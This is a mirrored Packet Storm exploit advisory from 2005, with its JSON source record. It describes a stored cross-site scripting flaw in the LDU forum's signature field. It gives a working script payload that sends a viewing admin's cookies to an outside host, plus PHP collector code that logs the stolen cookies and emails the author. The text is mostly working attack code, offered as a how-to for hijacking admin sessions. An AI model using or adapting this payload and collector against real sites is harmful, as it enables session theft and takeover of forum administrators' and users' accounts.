Search...

lduXSS2.txt

2005-08-31T00:00:00

ID PACKETSTORM:39697
Type packetstorm
Reporter spyMASter
Modified 2005-08-31T00:00:00

Description

                                        
                                            `Bug finder:spyMASter  
Web site:Realhackers.net  
Contact:bendeniz_avci@hotmail.com  
  
LDU has some xss vulns   
Firstly you can use html codes in your signature you can get cookies with this  
put your signature that code  
  
&lt;SCRIPT&gt; location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)&lt;/SCRIPT&gt;  
  
and post a topic to forum when admin look this topic she/he redirect and you can get cookie  
  
this is codes of ekle.php you can save cookie to a with this php code  
  
  
&lt;?php  
$kayit = fopen("spymaster.txt","a");  
foreach($_GET as $variable =&gt; $value) {  
fwrite($kayit,$variable . ": " . $value . "\n");  
}  
fwrite($kayit,"---------------------------\n");  
fclose($kayit);  
mail("bendeniz_avci@hotmail.com","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: spymaster@realhackers.net');  
?&gt;  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:39697", "type": "packetstorm", "bulletinFamily": "exploit", "title": "lduXSS2.txt", "description": "", "published": "2005-08-31T00:00:00", "modified": "2005-08-31T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/39697/lduXSS2.txt.html", "reporter": "spyMASter", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:29:21", "viewCount": 1, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:29:21", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:21", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/39697/lduXSS2.txt", "sourceData": "`Bug finder:spyMASter \nWeb site:Realhackers.net \nContact:bendeniz_avci@hotmail.com \n \nLDU has some xss vulns \nFirstly you can use html codes in your signature you can get cookies with this \nput your signature that code \n \n<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT> \n \nand post a topic to forum when admin look this topic she/he redirect and you can get cookie \n \nthis is codes of ekle.php you can save cookie to a with this php code \n \n \n<?php \n$kayit = fopen(\"spymaster.txt\",\"a\"); \nforeach($_GET as $variable => $value) { \nfwrite($kayit,$variable . \": \" . $value . \"\\n\"); \n} \nfwrite($kayit,\"---------------------------\\n\"); \nfclose($kayit); \nmail(\"bendeniz_avci@hotmail.com\",\"your cookie ready\",\"http://www.realhackers.net/spyoku.txt\",'From: spymaster@realhackers.net'); \n?> \n \n`\n", "immutableFields": []}